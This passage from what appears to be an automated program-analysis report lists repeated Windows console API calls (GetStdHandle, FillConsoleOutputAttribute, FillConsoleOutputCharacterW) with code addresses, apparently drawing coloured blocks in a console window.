                                                    • GetStdHandle.KERNEL32(000000F5), ref: 00401FA7
                                                    • FillConsoleOutputAttribute.KERNEL32(00000000,000000C0,00000005,?,?), ref: 00401FD1
                                                    • FillConsoleOutputCharacterW.KERNEL32(00000000,00000020,00000005,?,?), ref: 00401FE2
                                                    • GetStdHandle.KERNEL32(000000F5), ref: 00401FE6
                                                    • FillConsoleOutputAttribute.KERNEL32(00000000,000000C0,00000004,?,?), ref: 0040200F
                                                    • FillConsoleOutputCharacterW.KERNEL32(00000000,00000020,00000004,?,?), ref: 00402020
                                                    • GetStdHandle.KERNEL32(000000F5), ref: 00402024
                                                    • FillConsoleOutputAttribute.KERNEL32(00000000,00000000,00000050,?,?), ref: 00402048
                                                    • FillConsoleOutputCharacterW.KERNEL32(00000000,00000020,00000050,?,?), ref: 00402059
                                                    • GetStdHandle.KERNEL32(000000F5), ref: 0040205D
                                                    • FillConsoleOutputAttribute.KERNEL32(00000000,00000040,00000004,?,?), ref: 00402084
                                                    • FillConsoleOutputCharacterW.KERNEL32(00000000,00000020,00000004,?,?), ref: 00402095
                                                    • GetStdHandle.KERNEL32(000000F5), ref: 00402099
                                                    • FillConsoleOutputAttribute.KERNEL32(00000000,00000040,00000001,?,?), ref: 004020C0
                                                    • FillConsoleOutputCharacterW.KERNEL32(00000000,00000020,00000001,?,?), ref: 004020D1
                                                    • GetStdHandle.KERNEL32(000000F5), ref: 004020D5
                                                    • FillConsoleOutputAttribute.KERNEL32(00000000,00000040,00000001,?,?), ref: 004020FC
                                                    • FillConsoleOutputCharacterW.KERNEL32(00000000,00000020,00000001,?,?), ref: 0040210D
                                                    • GetStdHandle.KERNEL32(000000F5), ref: 00402111
                                                    • FillConsoleOutputAttribute.KERNEL32(00000000,00000040,00000003,?,?), ref: 00402138
                                                    • FillConsoleOutputCharacterW.KERNEL32(00000000,00000020,00000003,?,?), ref: 00402149
                                                    • GetStdHandle.KERNEL32(000000F5), ref: 0040214D
                                                    • FillConsoleOutputAttribute.KERNEL32(00000000,00000040,00000001,?,?), ref: 00402174
                                                    • FillConsoleOutputCharacterW.KERNEL32(00000000,00000020,00000001,?,?), ref: 00402185
                                                    • GetStdHandle.KERNEL32(000000F5), ref: 00402189
                                                    • FillConsoleOutputAttribute.KERNEL32(00000000,00000040,00000003,?,?), ref: 004021B0
                                                    • FillConsoleOutputCharacterW.KERNEL32(00000000,00000020,00000003,?,?), ref: 004021C1
                                                    • GetStdHandle.KERNEL32(000000F5), ref: 004021C5
                                                    • FillConsoleOutputAttribute.KERNEL32(00000000,00000040,00000001,?,?), ref: 004021EC
                                                    • FillConsoleOutputCharacterW.KERNEL32(00000000,00000020,00000001,?,?), ref: 004021FD
                                                    • GetStdHandle.KERNEL32(000000F5), ref: 00402201
                                                    • FillConsoleOutputAttribute.KERNEL32(00000000,000000C0,00000002,?,?), ref: 0040222B
                                                    • FillConsoleOutputCharacterW.KERNEL32(00000000,00000020,00000002,?,?), ref: 0040223C
                                                    • GetStdHandle.KERNEL32(000000F5), ref: 00402240
                                                    • FillConsoleOutputAttribute.KERNEL32(00000000,000000C0,00000001,?,?), ref: 0040226A
                                                    • FillConsoleOutputCharacterW.KERNEL32(00000000,00000020,00000001,?,?), ref: 0040227B
                                                    • GetStdHandle.KERNEL32(000000F5), ref: 0040227F
                                                    • FillConsoleOutputAttribute.KERNEL32(00000000,000000C0,00000001,?,?), ref: 004022A9
                                                    • FillConsoleOutputCharacterW.KERNEL32(00000000,00000020,00000001,?,?), ref: 004022BA
                                                    • GetStdHandle.KERNEL32(000000F5), ref: 004022BE
                                                    • FillConsoleOutputAttribute.KERNEL32(00000000,000000C0,00000001,?,?), ref: 004022E8
                                                    • FillConsoleOutputCharacterW.KERNEL32(00000000,00000020,00000001,?,?), ref: 004022F9
                                                    • GetStdHandle.KERNEL32(000000F5), ref: 004022FD
                                                    • FillConsoleOutputAttribute.KERNEL32(00000000,000000C0,00000001,?,?), ref: 00402327
                                                    • FillConsoleOutputCharacterW.KERNEL32(00000000,00000020,00000001,?,?), ref: 00402338
                                                    • GetStdHandle.KERNEL32(000000F5), ref: 0040233C
                                                    • FillConsoleOutputAttribute.KERNEL32(00000000,000000C0,00000001,?,?), ref: 00402366
                                                    • FillConsoleOutputCharacterW.KERNEL32(00000000,00000020,00000001,?,?), ref: 00402377
                                                    • GetStdHandle.KERNEL32(000000F5), ref: 0040237B
                                                    • FillConsoleOutputAttribute.KERNEL32(00000000,000000C0,00000003,?,?), ref: 004023A5
                                                    • FillConsoleOutputCharacterW.KERNEL32(00000000,00000020,00000003,?,?), ref: 004023B6
                                                    • GetStdHandle.KERNEL32(000000F5), ref: 004023BA
                                                    • FillConsoleOutputAttribute.KERNEL32(00000000,000000C0,00000003,?,?), ref: 004023E4
                                                    • FillConsoleOutputCharacterW.KERNEL32(00000000,00000020,00000003,?,?), ref: 004023F5
                                                    • GetStdHandle.KERNEL32(000000F5), ref: 004023F9
                                                    • FillConsoleOutputAttribute.KERNEL32(00000000,00000000,00000050,?,?), ref: 0040241D
                                                    • FillConsoleOutputCharacterW.KERNEL32(00000000,00000020,00000050,?,?), ref: 0040242E
                                                    • GetStdHandle.KERNEL32(000000F5), ref: 00402432
                                                    • FillConsoleOutputAttribute.KERNEL32(00000000,00000040,00000001,?,?), ref: 00402459
                                                    • FillConsoleOutputCharacterW.KERNEL32(00000000,00000020,00000001,?,?), ref: 0040246A
                                                    • GetStdHandle.KERNEL32(000000F5), ref: 0040246E
                                                    • FillConsoleOutputAttribute.KERNEL32(00000000,00000040,00000001,?,?), ref: 00402495
                                                    • FillConsoleOutputCharacterW.KERNEL32(00000000,00000020,00000001,?,?), ref: 004024A6
                                                    • GetStdHandle.KERNEL32(000000F5), ref: 004024AA
                                                    • FillConsoleOutputAttribute.KERNEL32(00000000,00000040,00000001,?,?), ref: 004024D1
                                                    • FillConsoleOutputCharacterW.KERNEL32(00000000,00000020,00000001,?,?), ref: 004024E2
                                                    • GetStdHandle.KERNEL32(000000F5), ref: 004024E6
                                                    • FillConsoleOutputAttribute.KERNEL32(00000000,00000040,00000002,?,?), ref: 0040250D
                                                    • FillConsoleOutputCharacterW.KERNEL32(00000000,00000020,00000002,?,?), ref: 0040251E
                                                    • GetStdHandle.KERNEL32(000000F5), ref: 00402522
                                                    • FillConsoleOutputAttribute.KERNEL32(00000000,00000040,00000001,?,?), ref: 00402549
                                                    • FillConsoleOutputCharacterW.KERNEL32(00000000,00000020,00000001,?,?), ref: 0040255A
                                                    • GetStdHandle.KERNEL32(000000F5), ref: 0040255E
                                                    • FillConsoleOutputAttribute.KERNEL32(00000000,00000040,00000002,?,?), ref: 00402585
                                                    • FillConsoleOutputCharacterW.KERNEL32(00000000,00000020,00000002,?,?), ref: 00402596
                                                    • GetStdHandle.KERNEL32(000000F5), ref: 0040259A
                                                    • FillConsoleOutputAttribute.KERNEL32(00000000,00000040,00000002,?,?), ref: 004025C1
                                                    • FillConsoleOutputCharacterW.KERNEL32(00000000,00000020,00000002,?,?), ref: 004025D2
                                                    • GetStdHandle.KERNEL32(000000F5), ref: 004025D6
                                                    • FillConsoleOutputAttribute.KERNEL32(00000000,000000C0,00000003,?,?), ref: 00402600
                                                    • FillConsoleOutputCharacterW.KERNEL32(00000000,00000020,00000003,?,?), ref: 00402611
                                                    • GetStdHandle.KERNEL32(000000F5), ref: 00402615
                                                    • FillConsoleOutputAttribute.KERNEL32(00000000,000000C0,00000001,?,?), ref: 0040263F
                                                    • FillConsoleOutputCharacterW.KERNEL32(00000000,00000020,00000001,?,?), ref: 00402650
                                                    • GetStdHandle.KERNEL32(000000F5), ref: 00402654
                                                    • FillConsoleOutputAttribute.KERNEL32(00000000,000000C0,00000001,?,?), ref: 0040267E
                                                    • FillConsoleOutputCharacterW.KERNEL32(00000000,00000020,00000001,?,?), ref: 0040268F
                                                    • GetStdHandle.KERNEL32(000000F5), ref: 00402693
                                                    • FillConsoleOutputAttribute.KERNEL32(00000000,000000C0,00000001,?,?), ref: 004026BD
                                                    • FillConsoleOutputCharacterW.KERNEL32(00000000,00000020,00000001,?,?), ref: 004026CE
                                                    • GetStdHandle.KERNEL32(000000F5), ref: 004026D2
                                                    • FillConsoleOutputAttribute.KERNEL32(00000000,000000C0,00000001,?,?), ref: 004026FC
                                                    • FillConsoleOutputCharacterW.KERNEL32(00000000,00000020,00000001,?,?), ref: 0040270D
                                                    • GetStdHandle.KERNEL32(000000F5), ref: 00402711
                                                    • FillConsoleOutputAttribute.KERNEL32(00000000,000000C0,00000002,?,?), ref: 0040273B
                                                    • FillConsoleOutputCharacterW.KERNEL32(00000000,00000020,00000002,?,?), ref: 0040274C
                                                    • GetStdHandle.KERNEL32(000000F5), ref: 00402750
                                                    • FillConsoleOutputAttribute.KERNEL32(00000000,000000C0,00000001,?,?), ref: 0040277A
                                                    • FillConsoleOutputCharacterW.KERNEL32(00000000,00000020,00000001,?,?), ref: 0040278B
                                                    • GetStdHandle.KERNEL32(000000F5), ref: 0040278F
                                                    • FillConsoleOutputAttribute.KERNEL32(00000000,000000C0,00000002,?,?), ref: 004027B9
                                                    • FillConsoleOutputCharacterW.KERNEL32(00000000,00000020,00000002,?,?), ref: 004027CA
                                                    • GetStdHandle.KERNEL32(000000F5), ref: 004027CE
                                                    • FillConsoleOutputAttribute.KERNEL32(00000000,00000000,00000050,?,?), ref: 004027F2
                                                    • FillConsoleOutputCharacterW.KERNEL32(00000000,00000020,00000050,?,?), ref: 00402803
                                                    • GetStdHandle.KERNEL32(000000F5), ref: 00402807
                                                    • FillConsoleOutputAttribute.KERNEL32(00000000,00000040,00000001,?,?), ref: 0040282E
                                                    • FillConsoleOutputCharacterW.KERNEL32(00000000,00000020,00000001,?,?), ref: 0040283F
                                                    • GetStdHandle.KERNEL32(000000F5), ref: 00402843
                                                    • FillConsoleOutputAttribute.KERNEL32(00000000,00000040,00000001,?,?), ref: 0040286A
                                                    • FillConsoleOutputCharacterW.KERNEL32(00000000,00000020,00000001,?,?), ref: 0040287B
                                                    • GetStdHandle.KERNEL32(000000F5), ref: 0040287F
                                                    • FillConsoleOutputAttribute.KERNEL32(00000000,00000040,00000001,?,?), ref: 004028A6
                                                    • FillConsoleOutputCharacterW.KERNEL32(00000000,00000020,00000001,?,?), ref: 004028B7
                                                    • GetStdHandle.KERNEL32(000000F5), ref: 004028BB
                                                    • FillConsoleOutputAttribute.KERNEL32(00000000,00000040,00000001,?,?), ref: 004028E2
                                                    • FillConsoleOutputCharacterW.KERNEL32(00000000,00000020,00000001,?,?), ref: 004028F3
                                                    • GetStdHandle.KERNEL32(000000F5), ref: 004028F7
                                                    • FillConsoleOutputAttribute.KERNEL32(00000000,00000040,00000001,?,?), ref: 0040291E
                                                    • FillConsoleOutputCharacterW.KERNEL32(00000000,00000020,00000001,?,?), ref: 0040292F
                                                    • GetStdHandle.KERNEL32(000000F5), ref: 00402933
                                                    • FillConsoleOutputAttribute.KERNEL32(00000000,00000040,00000001,?,?), ref: 0040295A
                                                    • FillConsoleOutputCharacterW.KERNEL32(00000000,00000020,00000001,?,?), ref: 0040296B
                                                    • GetStdHandle.KERNEL32(000000F5), ref: 0040296F
                                                    • FillConsoleOutputAttribute.KERNEL32(00000000,00000040,00000001,?,?), ref: 00402996
                                                    • FillConsoleOutputCharacterW.KERNEL32(00000000,00000020,00000001,?,?), ref: 004029A7
                                                    • GetStdHandle.KERNEL32(000000F5), ref: 004029AB
                                                    • FillConsoleOutputAttribute.KERNEL32(00000000,000000C0,00000003,?,?), ref: 004029D5
                                                    • FillConsoleOutputCharacterW.KERNEL32(00000000,00000020,00000003,?,?), ref: 004029E6
                                                    • GetStdHandle.KERNEL32(000000F5), ref: 004029EA
                                                    • FillConsoleOutputAttribute.KERNEL32(00000000,000000C0,00000001,?,?), ref: 00402A14
                                                    • FillConsoleOutputCharacterW.KERNEL32(00000000,00000020,00000001,?,?), ref: 00402A25
                                                    • GetStdHandle.KERNEL32(000000F5), ref: 00402A29
                                                    • FillConsoleOutputAttribute.KERNEL32(00000000,000000C0,00000001,?,?), ref: 00402A53
                                                    • FillConsoleOutputCharacterW.KERNEL32(00000000,00000020,00000001,?,?), ref: 00402A64
                                                    • GetStdHandle.KERNEL32(000000F5), ref: 00402A68
                                                    • FillConsoleOutputAttribute.KERNEL32(00000000,000000C0,00000001,?,?), ref: 00402A92
                                                    • FillConsoleOutputCharacterW.KERNEL32(00000000,00000020,00000001,?,?), ref: 00402AA3
                                                    • GetStdHandle.KERNEL32(000000F5), ref: 00402AA7
                                                    • FillConsoleOutputAttribute.KERNEL32(00000000,000000C0,00000001,?,?), ref: 00402AD1
                                                    • FillConsoleOutputCharacterW.KERNEL32(00000000,00000020,00000001,?,?), ref: 00402AE2
                                                    • GetStdHandle.KERNEL32(000000F5), ref: 00402AE6
                                                    • FillConsoleOutputAttribute.KERNEL32(00000000,000000C0,00000002,?,?), ref: 00402B10
                                                    • FillConsoleOutputCharacterW.KERNEL32(00000000,00000020,00000002,?,?), ref: 00402B21
                                                    • GetStdHandle.KERNEL32(000000F5), ref: 00402B25
                                                    • FillConsoleOutputAttribute.KERNEL32(00000000,000000C0,00000001,?,?), ref: 00402B4F
                                                    • FillConsoleOutputCharacterW.KERNEL32(00000000,00000020,00000001,?,?), ref: 00402B60
                                                    • GetStdHandle.KERNEL32(000000F5), ref: 00402B64
                                                    • FillConsoleOutputAttribute.KERNEL32(00000000,000000C0,00000002,?,?), ref: 00402B8E
                                                    • FillConsoleOutputCharacterW.KERNEL32(00000000,00000020,00000002,?,?), ref: 00402B9F
                                                    • GetStdHandle.KERNEL32(000000F5), ref: 00402BA3
                                                    • FillConsoleOutputAttribute.KERNEL32(00000000,00000000,00000050,?,?), ref: 00402BC7
                                                    • FillConsoleOutputCharacterW.KERNEL32(00000000,00000020,00000050,?,?), ref: 00402BD8
                                                    • GetStdHandle.KERNEL32(000000F5), ref: 00402BDC
                                                    • FillConsoleOutputAttribute.KERNEL32(00000000,00000040,00000001,?,?), ref: 00402C03
                                                    • FillConsoleOutputCharacterW.KERNEL32(00000000,00000020,00000001,?,?), ref: 00402C14
                                                    • GetStdHandle.KERNEL32(000000F5), ref: 00402C18
                                                    • FillConsoleOutputAttribute.KERNEL32(00000000,00000040,00000001,?,?), ref: 00402C3F
                                                    • FillConsoleOutputCharacterW.KERNEL32(00000000,00000020,00000001,?,?), ref: 00402C50
                                                    • GetStdHandle.KERNEL32(000000F5), ref: 00402C54
                                                    • FillConsoleOutputAttribute.KERNEL32(00000000,00000040,00000002,?,?), ref: 00402C7B
                                                    • FillConsoleOutputCharacterW.KERNEL32(00000000,00000020,00000002,?,?), ref: 00402C8C
                                                    • GetStdHandle.KERNEL32(000000F5), ref: 00402C90
                                                    • FillConsoleOutputAttribute.KERNEL32(00000000,000000C0,00000003,?,?), ref: 00402CBA
                                                    • FillConsoleOutputCharacterW.KERNEL32(00000000,00000020,00000003,?,?), ref: 00402CCB
                                                    • GetStdHandle.KERNEL32(000000F5), ref: 00402CCF
                                                    • FillConsoleOutputAttribute.KERNEL32(00000000,000000C0,00000001,?,?), ref: 00402CF9
                                                    • FillConsoleOutputCharacterW.KERNEL32(00000000,00000020,00000001,?,?), ref: 00402D0A
                                                    • GetStdHandle.KERNEL32(000000F5), ref: 00402D0E
                                                    • FillConsoleOutputAttribute.KERNEL32(00000000,000000C0,00000002,?,?), ref: 00402D38
                                                    • FillConsoleOutputCharacterW.KERNEL32(00000000,00000020,00000002,?,?), ref: 00402D49
                                                    • GetStdHandle.KERNEL32(000000F5), ref: 00402D4D
                                                    • FillConsoleOutputAttribute.KERNEL32(00000000,000000C0,00000002,?,?), ref: 00402D77
                                                    • FillConsoleOutputCharacterW.KERNEL32(00000000,00000020,00000002,?,?), ref: 00402D88
                                                    • GetStdHandle.KERNEL32(000000F5), ref: 00402D8C
                                                    • FillConsoleOutputAttribute.KERNEL32(00000000,000000C0,00000001,?,?), ref: 00402DB6
                                                    • FillConsoleOutputCharacterW.KERNEL32(00000000,00000020,00000001,?,?), ref: 00402DC7
                                                    • GetStdHandle.KERNEL32(000000F5), ref: 00402DCB
                                                    • FillConsoleOutputAttribute.KERNEL32(00000000,000000C0,00000002,?,?), ref: 00402DF5
                                                    • FillConsoleOutputCharacterW.KERNEL32(00000000,00000020,00000002,?,?), ref: 00402E06
                                                    • GetStdHandle.KERNEL32(000000F5), ref: 00402E0A
                                                    • FillConsoleOutputAttribute.KERNEL32(00000000,000000C0,00000002,?,?), ref: 00402E34
                                                    • FillConsoleOutputCharacterW.KERNEL32(00000000,00000020,00000002,?,?), ref: 00402E45
                                                    • GetStdHandle.KERNEL32(000000F5), ref: 00402E49
                                                    • FillConsoleOutputAttribute.KERNEL32(00000000,00000000,00000050,?,?), ref: 00402E6D
                                                    • FillConsoleOutputCharacterW.KERNEL32(00000000,00000020,00000050,?,?), ref: 00402E7E
                                                    • GetStdHandle.KERNEL32(000000F5), ref: 00402E82
                                                    • FillConsoleOutputAttribute.KERNEL32(00000000,00000040,00000001,?,?), ref: 00402EA6
                                                    • FillConsoleOutputCharacterW.KERNEL32(00000000,00000020,00000001,?,?), ref: 00402EB7
                                                    • GetStdHandle.KERNEL32(000000F5), ref: 00402EBB
                                                    • FillConsoleOutputAttribute.KERNEL32(00000000,00000040,00000001,?,?), ref: 00402EE2
                                                    • FillConsoleOutputCharacterW.KERNEL32(00000000,00000020,00000001,?,?), ref: 00402EF3
                                                    • GetStdHandle.KERNEL32(000000F5), ref: 00402EF7
                                                    • FillConsoleOutputAttribute.KERNEL32(00000000,00000040,00000001,?,?), ref: 00402F1E
                                                    • FillConsoleOutputCharacterW.KERNEL32(00000000,00000020,00000001,?,?), ref: 00402F2F
                                                    • GetStdHandle.KERNEL32(000000F5), ref: 00402F33
                                                    • FillConsoleOutputAttribute.KERNEL32(00000000,00000040,00000001,?,?), ref: 00402F5A
                                                    • FillConsoleOutputCharacterW.KERNEL32(00000000,00000020,00000001,?,?), ref: 00402F6B
                                                    • GetStdHandle.KERNEL32(000000F5), ref: 00402F6F
                                                    • FillConsoleOutputAttribute.KERNEL32(00000000,000000C0,00000003,?,?), ref: 00402F99
                                                    • FillConsoleOutputCharacterW.KERNEL32(00000000,00000020,00000003,?,?), ref: 00402FAA
                                                    • GetStdHandle.KERNEL32(000000F5), ref: 00402FAE
                                                    • FillConsoleOutputAttribute.KERNEL32(00000000,000000C0,00000001,?,?), ref: 00402FD8
                                                    • FillConsoleOutputCharacterW.KERNEL32(00000000,00000020,00000001,?,?), ref: 00402FE9
                                                    • GetStdHandle.KERNEL32(000000F5), ref: 00402FED
                                                    • FillConsoleOutputAttribute.KERNEL32(00000000,000000C0,00000002,?,?), ref: 00403017
                                                    • FillConsoleOutputCharacterW.KERNEL32(00000000,00000020,00000002,?,?), ref: 00403028
                                                    • GetStdHandle.KERNEL32(000000F5), ref: 0040302C
                                                    • FillConsoleOutputAttribute.KERNEL32(00000000,000000C0,00000002,?,?), ref: 00403056
                                                    • FillConsoleOutputCharacterW.KERNEL32(00000000,00000020,00000002,?,?), ref: 00403067
                                                    • GetStdHandle.KERNEL32(000000F5), ref: 0040306B
                                                    • FillConsoleOutputAttribute.KERNEL32(00000000,000000C0,00000001,?,?), ref: 00403095
                                                    • FillConsoleOutputCharacterW.KERNEL32(00000000,00000020,00000001,?,?), ref: 004030A6
                                                    • GetStdHandle.KERNEL32(000000F5), ref: 004030AA
                                                    • FillConsoleOutputAttribute.KERNEL32(00000000,000000C0,00000002,?,?), ref: 004030D4
                                                    • FillConsoleOutputCharacterW.KERNEL32(00000000,00000020,00000002,?,?), ref: 004030E5
                                                    • GetStdHandle.KERNEL32(000000F5), ref: 004030E9
                                                    • FillConsoleOutputAttribute.KERNEL32(00000000,000000C0,00000001,?,?), ref: 00403113
                                                    • FillConsoleOutputCharacterW.KERNEL32(00000000,00000020,00000001,?,?), ref: 00403124
                                                    • GetStdHandle.KERNEL32(000000F5), ref: 00403128
                                                    • FillConsoleOutputAttribute.KERNEL32(00000000,000000C0,00000002,?,?), ref: 00403152
                                                    • FillConsoleOutputCharacterW.KERNEL32(00000000,00000020,00000002,?,?), ref: 00403163
                                                    • GetStdHandle.KERNEL32(000000F5), ref: 00403167
                                                    • FillConsoleOutputAttribute.KERNEL32(00000000,00000000,00000050,?,?), ref: 0040318B
                                                    • FillConsoleOutputCharacterW.KERNEL32(00000000,00000020,00000050,?,?), ref: 0040319C
                                                    • GetStdHandle.KERNEL32(000000F5), ref: 004031A0
                                                    • FillConsoleOutputAttribute.KERNEL32(00000000,00000040,00000001,?,?), ref: 004031C7
                                                    • FillConsoleOutputCharacterW.KERNEL32(00000000,00000020,00000001,?,?), ref: 004031D8
                                                    • GetStdHandle.KERNEL32(000000F5), ref: 004031DC
                                                    • FillConsoleOutputAttribute.KERNEL32(00000000,00000040,00000004,?,?), ref: 00403203
                                                    • FillConsoleOutputCharacterW.KERNEL32(00000000,00000020,00000004,?,?), ref: 00403214
                                                    • GetStdHandle.KERNEL32(000000F5), ref: 00403218
                                                    • FillConsoleOutputAttribute.KERNEL32(00000000,00000040,00000001,?,?), ref: 0040323F
                                                    • FillConsoleOutputCharacterW.KERNEL32(00000000,00000020,00000001,?,?), ref: 00403250
                                                    • GetStdHandle.KERNEL32(000000F5), ref: 00403254
                                                    • FillConsoleOutputAttribute.KERNEL32(00000000,00000040,00000001,?,?), ref: 0040327B
                                                    • FillConsoleOutputCharacterW.KERNEL32(00000000,00000020,00000001,?,?), ref: 0040328C
                                                    • GetStdHandle.KERNEL32(000000F5), ref: 00403290
                                                    • FillConsoleOutputAttribute.KERNEL32(00000000,00000040,00000001,?,?), ref: 004032B7
                                                    • FillConsoleOutputCharacterW.KERNEL32(00000000,00000020,00000001,?,?), ref: 004032C8
                                                    • GetStdHandle.KERNEL32(000000F5), ref: 004032CC
                                                    • FillConsoleOutputAttribute.KERNEL32(00000000,00000040,00000002,?,?), ref: 004032F3
                                                    • FillConsoleOutputCharacterW.KERNEL32(00000000,00000020,00000002,?,?), ref: 00403304
                                                    • GetStdHandle.KERNEL32(000000F5), ref: 00403308
                                                    • FillConsoleOutputAttribute.KERNEL32(00000000,000000C0,00000002,?,?), ref: 00403332
                                                    • FillConsoleOutputCharacterW.KERNEL32(00000000,00000020,00000002,?,?), ref: 00403343
                                                    • GetStdHandle.KERNEL32(000000F5), ref: 00403347
                                                    • FillConsoleOutputAttribute.KERNEL32(00000000,000000C0,00000001,?,?), ref: 00403371
                                                    • FillConsoleOutputCharacterW.KERNEL32(00000000,00000020,00000001,?,?), ref: 00403382
                                                    • GetStdHandle.KERNEL32(000000F5), ref: 00403386
                                                    • FillConsoleOutputAttribute.KERNEL32(00000000,000000C0,00000003,?,?), ref: 004033B0
                                                    • FillConsoleOutputCharacterW.KERNEL32(00000000,00000020,00000003,?,?), ref: 004033C1
                                                    • GetStdHandle.KERNEL32(000000F5), ref: 004033C5
                                                    • FillConsoleOutputAttribute.KERNEL32(00000000,000000C0,00000003,?,?), ref: 004033EF
                                                    • FillConsoleOutputCharacterW.KERNEL32(00000000,00000020,00000003,?,?), ref: 00403400
                                                    • GetStdHandle.KERNEL32(000000F5), ref: 00403404
                                                    • FillConsoleOutputAttribute.KERNEL32(00000000,000000C0,00000001,?,?), ref: 0040342E
                                                    • FillConsoleOutputCharacterW.KERNEL32(00000000,00000020,00000001,?,?), ref: 0040343F
                                                    • GetStdHandle.KERNEL32(000000F5), ref: 00403443
                                                    • FillConsoleOutputAttribute.KERNEL32(00000000,000000C0,00000002,?,?), ref: 0040346D
                                                    • FillConsoleOutputCharacterW.KERNEL32(00000000,00000020,00000002,?,?), ref: 0040347E
                                                    • GetStdHandle.KERNEL32(000000F5), ref: 00403482
                                                    • FillConsoleOutputAttribute.KERNEL32(00000000,000000C0,00000002,?,?), ref: 004034AC
                                                    • FillConsoleOutputCharacterW.KERNEL32(00000000,00000020,00000002,?,?), ref: 004034BD
                                                    • GetStdHandle.KERNEL32(000000F5), ref: 004034C1
                                                    • FillConsoleOutputAttribute.KERNEL32(00000000,00000000,00000050,?,?), ref: 004034E5
                                                    • FillConsoleOutputCharacterW.KERNEL32(00000000,00000020,00000050,?,?), ref: 004034F6
                                                    • GetStdHandle.KERNEL32(000000F5), ref: 004034FA
                                                    • FillConsoleOutputAttribute.KERNEL32(00000000,00000040,00000001,?,?), ref: 00403521
                                                    • FillConsoleOutputCharacterW.KERNEL32(00000000,00000020,00000001,?,?), ref: 00403532
                                                    • GetStdHandle.KERNEL32(000000F5), ref: 00403536
                                                    • FillConsoleOutputAttribute.KERNEL32(00000000,00000040,00000004,?,?), ref: 0040355D
                                                    • FillConsoleOutputCharacterW.KERNEL32(00000000,00000020,00000004,?,?), ref: 0040356E
                                                    • GetStdHandle.KERNEL32(000000F5), ref: 00403572
                                                    • FillConsoleOutputAttribute.KERNEL32(00000000,00000040,00000007,?,?), ref: 00403599
                                                    • FillConsoleOutputCharacterW.KERNEL32(00000000,00000020,00000007,?,?), ref: 004035AA
                                                    • GetStdHandle.KERNEL32(000000F5), ref: 004035AE
                                                    • FillConsoleOutputAttribute.KERNEL32(00000000,00000040,00000007,?,?), ref: 004035D5
                                                    • FillConsoleOutputCharacterW.KERNEL32(00000000,00000020,00000007,?,?), ref: 004035E6
                                                    • GetStdHandle.KERNEL32(000000F5), ref: 004035EA
                                                    • FillConsoleOutputAttribute.KERNEL32(00000000,000000C0,00000002,?,?), ref: 00403614
                                                    • FillConsoleOutputCharacterW.KERNEL32(00000000,00000020,00000002,?,?), ref: 00403625
                                                    • GetStdHandle.KERNEL32(000000F5), ref: 00403629
                                                    • FillConsoleOutputAttribute.KERNEL32(00000000,000000C0,00000001,?,?), ref: 00403653
                                                    • FillConsoleOutputCharacterW.KERNEL32(00000000,00000020,00000001,?,?), ref: 00403664
                                                    • GetStdHandle.KERNEL32(000000F5), ref: 00403668
                                                    • FillConsoleOutputAttribute.KERNEL32(00000000,000000C0,00000005,?,?), ref: 00403692
                                                    • FillConsoleOutputCharacterW.KERNEL32(00000000,00000020,00000005,?,?), ref: 004036A3
                                                    • GetStdHandle.KERNEL32(000000F5), ref: 004036A7
                                                    • FillConsoleOutputAttribute.KERNEL32(00000000,000000C0,00000005,?,?), ref: 004036D1
                                                    • FillConsoleOutputCharacterW.KERNEL32(00000000,00000020,00000005,?,?), ref: 004036E2
                                                    • GetStdHandle.KERNEL32(000000F5), ref: 004036E6
                                                    • FillConsoleOutputAttribute.KERNEL32(00000000,000000C0,00000001,?,?), ref: 00403710
                                                    • FillConsoleOutputCharacterW.KERNEL32(00000000,00000020,00000001,?,?), ref: 00403721
                                                    • GetStdHandle.KERNEL32(000000F5), ref: 00403725
                                                    • FillConsoleOutputAttribute.KERNEL32(00000000,000000C0,00000002,?,?), ref: 0040374F
                                                    • FillConsoleOutputCharacterW.KERNEL32(00000000,00000020,00000002,?,?), ref: 00403760
                                                    • GetStdHandle.KERNEL32(000000F5), ref: 00403764
                                                    • FillConsoleOutputAttribute.KERNEL32(00000000,000000C0,00000001,?,?), ref: 0040378E
                                                    • FillConsoleOutputCharacterW.KERNEL32(00000000,00000020,00000001,?,?), ref: 0040379F
                                                    • GetStdHandle.KERNEL32(000000F5), ref: 004037A3
                                                    • FillConsoleOutputAttribute.KERNEL32(00000000,000000C0,00000002,?,?), ref: 004037CD
                                                    • FillConsoleOutputCharacterW.KERNEL32(00000000,00000020,00000002,?,?), ref: 004037DE
                                                    • GetStdHandle.KERNEL32(000000F5), ref: 004037E2
                                                    • FillConsoleOutputAttribute.KERNEL32(00000000,00000000,00000050,?,?), ref: 00403806
                                                    • FillConsoleOutputCharacterW.KERNEL32(00000000,00000020,00000050,?,?), ref: 00403817
                                                    • GetStdHandle.KERNEL32(000000F5), ref: 0040381B
                                                    • FillConsoleOutputAttribute.KERNEL32(00000000,00000040,00000001,?,?), ref: 00403842
                                                    • FillConsoleOutputCharacterW.KERNEL32(00000000,00000020,00000001,?,?), ref: 00403853
                                                    • GetStdHandle.KERNEL32(000000F5), ref: 00403857
                                                    • FillConsoleOutputAttribute.KERNEL32(00000000,00000040,00000001,?,?), ref: 0040387E
                                                    • FillConsoleOutputCharacterW.KERNEL32(00000000,00000020,00000001,?,?), ref: 0040388F
                                                    • GetStdHandle.KERNEL32(000000F5), ref: 00403893
                                                    • FillConsoleOutputAttribute.KERNEL32(00000000,00000040,00000001,?,?), ref: 004038BA
                                                    • FillConsoleOutputCharacterW.KERNEL32(00000000,00000020,00000001,?,?), ref: 004038CB
                                                    • GetStdHandle.KERNEL32(000000F5), ref: 004038CF
                                                    • FillConsoleOutputAttribute.KERNEL32(00000000,000000C0,00000003,?,?), ref: 004038F9
                                                    • FillConsoleOutputCharacterW.KERNEL32(00000000,00000020,00000003,?,?), ref: 0040390A
                                                    • GetStdHandle.KERNEL32(000000F5), ref: 0040390E
                                                    • FillConsoleOutputAttribute.KERNEL32(00000000,000000C0,00000001,?,?), ref: 00403938
                                                    • FillConsoleOutputCharacterW.KERNEL32(00000000,00000020,00000001,?,?), ref: 00403949
                                                    • GetStdHandle.KERNEL32(000000F5), ref: 0040394D
                                                    • FillConsoleOutputAttribute.KERNEL32(00000000,000000C0,00000006,?,?), ref: 00403977
                                                    • FillConsoleOutputCharacterW.KERNEL32(00000000,00000020,00000006,?,?), ref: 00403988
                                                    • GetStdHandle.KERNEL32(000000F5), ref: 0040398C
                                                    • FillConsoleOutputAttribute.KERNEL32(00000000,000000C0,00000006,?,?), ref: 004039B6
                                                    • FillConsoleOutputCharacterW.KERNEL32(00000000,00000020,00000006,?,?), ref: 004039C7
                                                    • GetStdHandle.KERNEL32(000000F5), ref: 004039CB
